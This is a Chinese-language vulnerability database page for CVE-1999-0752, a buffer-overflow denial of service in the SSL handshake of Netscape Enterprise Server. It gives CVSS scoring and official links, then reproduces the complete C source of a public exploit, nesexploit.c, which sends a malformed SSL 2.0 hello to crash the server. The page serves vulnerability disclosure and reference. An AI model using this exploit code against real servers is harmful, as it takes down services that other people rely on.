CVE-1999-0752
CVSS5.0
发布时间 :1999-07-06 00:00:00
修订时间 :2008-09-09 08:35:20
NMCOE    

[原文]Denial of service in Netscape Enterprise Server via a buffer overflow in the SSL handshake.


[CNNVD]Netscape Enterprise Server服务拒绝漏洞(CNNVD-199907-010)

        Netscape Enterprise Server通过SSL层信号交换中的缓冲区溢出产生服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0752
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0752
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-010
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Netscape Enterprise Server服务拒绝漏洞
中危 缓冲区溢出
1999-07-06 00:00:00 2006-09-05 00:00:00
远程  
        Netscape Enterprise Server通过SSL层信号交换中的缓冲区溢出产生服务拒绝。

- 公告与补丁

        

- 漏洞信息 (19416)

Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability (EDBID:19416)
windows dos
1999-07-06 Verified
0 Arne Vidstrom
N/A [点击下载]
source: http://www.securityfocus.com/bid/516/info

Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. 

  //
  // nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se
  //
  // This program crashes Netscape Enterprise Server when it is
  // running in SSL mode, by exploiting a bug in the SSL handshake
  // code. The server crashes if the client:
  //
  //  * starts with SSL 2.0 format
  //  * uses long record header
  //  * uses padding >= 8
  //  * sends at least 11 bytes more data than it specifies in the
  //    header
  //  * sends at least about 4 kb data
  //
  // I haven't included any error handling in the code because it's
  // so boring to write... ;o)
  //

  #include <winsock.h>
  #include <string.h>
  #include <stdio.h>

  #define sockaddr_in struct sockaddr_in
  #define sockaddr struct sockaddr

  // Some combinations of these three constants will crash the server,
  // others will not.

  #define PADDING 8
  #define SPECIFIED_SIZE 11822
  #define ACTUAL_SIZE 11833

  void main(void)
  {
          // IP address of the server - set to your own server and nobody
          // elses :o)
          char ipaddr[25] = "xxx.xxx.xxx.xxx";

          // SSL port
          unsigned short port = xxxxx;

          SOCKET socket1;
          unsigned char s[65536];
          int errorCode;
          WSADATA winSockData;
          sockaddr_in peer;
          int result;
          unsigned char i;
          unsigned int l;
          int flags;

          printf("\nnesexploit.c - developed by Arne Vidstrom,
  winnt@bahnhof.se\n\n");

          // Allocate a socket, connect and stuff...
          errorCode = WSAStartup(0x0101, &winSockData);
          socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
          peer.sin_family = AF_INET;
          peer.sin_port = htons(port);
          peer.sin_addr.s_addr = inet_addr(ipaddr);
          for (i = 0; i < 8; i++)
                  peer.sin_zero[i] = 0;
          result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
          if (result != 0)
                  printf("Ehmn, where's that server? ;o)\n\n");

          // Initialize the buffer with a lot of '.' Anything would do...
          for (l=0; l<65536; l++)
                  s[l] = '.';

          // Version 2.0 Format Header with padding.
          // Shouldn't be any padding because this part is not encrypted,
          // but without padding the server won't crash. :o)
          s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
          s[1] = (SPECIFIED_SIZE & 0x00ff);
          s[2] = PADDING;

          // Client says Hello!
          s[3] = 0x01;

          // Client wishes to use Version 3.0 later (there will be no "later"
  though...)
          s[4] = 0x03;
          s[5] = 0x00;

          // Cipher Specs Length = 3
          s[6] = 0x00;
          s[7] = 0x0c;

          // Session ID = 0
          s[8] = 0x00;
          s[9] = 0x00;

          // Challenge Length = 16
          s[10] = 0x00;
          s[11] = 0x10;

          // Challenge Specs Data
          s[12] = 0x02;
          s[13] = 0x00;
          s[14] = 0x80;

          s[15] = 0x04;
          s[16] = 0x00;
          s[17] = 0x80;

          s[18] = 0x00;
          s[19] = 0x00;
          s[20] = 0x03;

          s[21] = 0x00;
          s[22] = 0x00;
          s[23] = 0x06;

          // Challenge Data is a few '.' from above

          // The rest is also '.' from above

          // Send all this to the server
          flags = 0;
          result = send(socket1, s, ACTUAL_SIZE, flags);
          if (result != SOCKET_ERROR)
                  printf("Done!\n\n");

          // Clean up
          closesocket(socket1);
          WSACleanup();
  }		

- 漏洞信息

121
Netscape Enterprise SSL Handshake DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-07-06 Unknow
1999-07-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站